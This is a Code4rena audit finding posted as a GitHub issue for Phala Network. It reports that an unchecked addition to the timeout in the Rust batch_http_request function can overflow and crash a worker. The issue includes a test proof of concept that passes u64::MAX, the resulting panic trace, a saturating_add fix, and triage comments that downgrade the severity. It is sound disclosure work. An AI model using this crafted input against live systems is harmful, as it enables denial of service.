code-423n4 / 2024-03-phala-network-findings

0 stars 0 forks source link

An attacker can crash the cluster system by sending an HTTP request with a huge timeout #43

Open c4-bot-8 opened 3 months ago

c4-bot-8 commented 3 months ago

Lines of code

https://github.com/code-423n4/2024-03-phala-network/blob/a01ffbe992560d8d0f17deadfb9b9a2bed38377e/phala-blockchain/crates/pink/chain-extension/src/lib.rs#L56

Vulnerability details

Impact

Any user can intentionally crash a worker by sending a maliciously crafted request with a huge timeout. This attack has no costs for the attacker, and it can result in a DoS of the worker/cluster system.

Proof of Concept

A user can specify a timeout when doing a batch_http_request:

    pub fn batch_http_request(requests: Vec<HttpRequest>, timeout_ms: u64) -> ext::BatchHttpResult {
        const MAX_CONCURRENT_REQUESTS: usize = 5;
        if requests.len() > MAX_CONCURRENT_REQUESTS {
            return Err(ext::HttpRequestError::TooManyRequests);
        }
        block_on(async move {
            let futs = requests
                .into_iter()
                .map(|request| async_http_request(request, timeout_ms));
            tokio::time::timeout(
@>              Duration::from_millis(timeout_ms + 200),
                futures::future::join_all(futs),
            )
            .await
        })
        .or(Err(ext::HttpRequestError::Timeout))
    }

https://github.com/code-423n4/2024-03-phala-network/blob/a01ffbe992560d8d0f17deadfb9b9a2bed38377e/phala-blockchain/crates/pink/chain-extension/src/lib.rs#L56

The issue is that in Rust, the + operator can overflow when numerics bound are exceeded: this will result in a panic error.

When a malicious user sends a request with a timeout greater than u64::MAX - 200, they will crash the worker. As this action will cost nothing to the attacker, they can simply send multiple requests to crash all the workers, which will result in a DoS of the cluster system.

Coded PoC

Copy-paste the following test in phala-blockchain/crates/pink/chain-extension/src/mock_ext.rs:

    #[cfg(test)]
    mod tests {
        use crate::PinkRuntimeEnv;
        use pink::chain_extension::{HttpRequest, PinkExtBackend};

        use super::*;

        #[test]
        fn http_timeout_panics() {
            mock_all_ext();
            let ext = MockExtension;
            assert_eq!(ext.address(), &AccountId32::new([0; 32]));
            let responses = ext
                .batch_http_request(
                    vec![
                        HttpRequest {
                            method: "GET".into(),
                            url: "https://httpbin.org/get".into(),
                            body: Default::default(),
                            headers: Default::default(),
                        },
                        HttpRequest {
                            method: "GET".into(),
                            url: "https://httpbin.org/get".into(),
                            body: Default::default(),
                            headers: Default::default(),
                        },
                    ],
                    u64::MAX, //@audit this will cause an overflow
                )
                .unwrap()
                .unwrap();
            assert_eq!(responses.len(), 2);
            for response in responses {
                assert!(response.is_ok());
            }
        }
    }

Output:

    running 1 test
    thread 'mock_ext::tests::http_timeout_panics' panicked at crates/pink/chain-extension/src/lib.rs:66:35:
    attempt to add with overflow
    stack backtrace:
       0: std::panicking::begin_panic_handler
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/std/src/panicking.rs:645
       1: core::panicking::panic_fmt
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/core/src/panicking.rs:72
       2: core::panicking::panic
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/core/src/panicking.rs:127
       3: pink_chain_extension::batch_http_request::async_block$0
                 at ./src/lib.rs:66
       4: tokio::runtime::park::impl$4::block_on::closure$0<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/park.rs:282
       5: tokio::runtime::coop::with_budget
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/coop.rs:107
       6: tokio::runtime::coop::budget
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/coop.rs:73
       7: tokio::runtime::park::CachedParkThread::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/park.rs:282
       8: tokio::runtime::context::blocking::BlockingRegionGuard::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/context/blocking.rs:66
       9: tokio::runtime::scheduler::multi_thread::impl$0::block_on::closure$0<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/scheduler/multi_thread/mod.rs:87
      10: tokio::runtime::context::runtime::enter_runtime<tokio::runtime::scheduler::multi_thread::impl$0::block_on::closure_env$0<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >,enum2$<core::result::Result<alloc::vec::Vec<enum2$<core::result:
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/context/runtime.rs:65
      11: tokio::runtime::scheduler::multi_thread::MultiThread::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/scheduler/multi_thread/mod.rs:86
      12: tokio::runtime::runtime::Runtime::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at /.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.35.1/src/runtime/runtime.rs:350
      13: pink_chain_extension::block_on<enum2$<pink_chain_extension::batch_http_request::async_block_env$0> >
                 at ./src/lib.rs:50
      14: pink_chain_extension::batch_http_request
                 at ./src/lib.rs:61
      15: pink_chain_extension::impl$1::batch_http_request<pink_chain_extension::mock_ext::MockExtension,alloc::string::String>
                 at ./src/lib.rs:192
      16: pink_chain_extension::mock_ext::impl$1::batch_http_request
                 at ./src/mock_ext.rs:36
      17: pink_chain_extension::mock_ext::tests::http_timeout_panics
                 at ./src/mock_ext.rs:198
      18: pink_chain_extension::mock_ext::tests::http_timeout_panics::closure$0
                 at ./src/mock_ext.rs:194
      19: core::ops::function::FnOnce::call_once<pink_chain_extension::mock_ext::tests::http_timeout_panics::closure_env$0,tuple$<> >
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/core/src/ops/function.rs:250
      20: core::ops::function::FnOnce::call_once
                 at /rustc/82e1608dfa6e0b5569232559e3d385fea5a93112/library/core/src/ops/function.rs:250
    note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
    test mock_ext::tests::http_timeout_panics ... FAILED

Tools Used

Manual review

Recommended Mitigation Steps

Consider using saturating_add instead:

    tokio::time::timeout(
-        Duration::from_millis(timeout_ms + 200),
+        Duration::from_millis(timeout_ms.saturating_add(200)),
         futures::future::join_all(futs),
    )

Assessed type

Invalid Validation

c4-pre-sort commented 3 months ago

141345 marked the issue as primary issue

c4-pre-sort commented 3 months ago

141345 marked the issue as sufficient quality report

141345 commented 3 months ago

no limit on timeout could be abused to DOS the system

kvinwang commented 3 months ago

The runtime doesn't call the implementation directly. Instead, it calls into the worker, via ocalls here, and the timeout is actually clamped in the worker side. However, the suggested change is good to have. This might be a QA or Mid Risk level report.

c4-sponsor commented 3 months ago

kvinwang (sponsor) confirmed

c4-sponsor commented 3 months ago

kvinwang marked the issue as disagree with severity

OpenCoreCH commented 3 months ago

Not sure about the severity here. @kvinwang Could you point out where the clamping happens? Because in the linked code it is a normal u64 that could potentially be set to e.g. u64::MAX - 1 to trigger the issue.

kvinwang commented 3 months ago

Could you point out where the clamping happens?

This is the OCalls implementation in the worker, where the time remaining is less than the MAX_QUERY_TIME

OpenCoreCH commented 3 months ago

Great, thanks for the link. In that case, I am downgrading this to a medium: It is not directly exploitable as an attacker, but the issue itself still exists within the codebase and if a future worker would integrate it differently / without limit, it could become exploitable.

c4-judge commented 3 months ago

OpenCoreCH changed the severity to 2 (Med Risk)

c4-judge commented 3 months ago

OpenCoreCH marked the issue as selected for report

c4-judge commented 3 months ago

OpenCoreCH marked the issue as satisfactory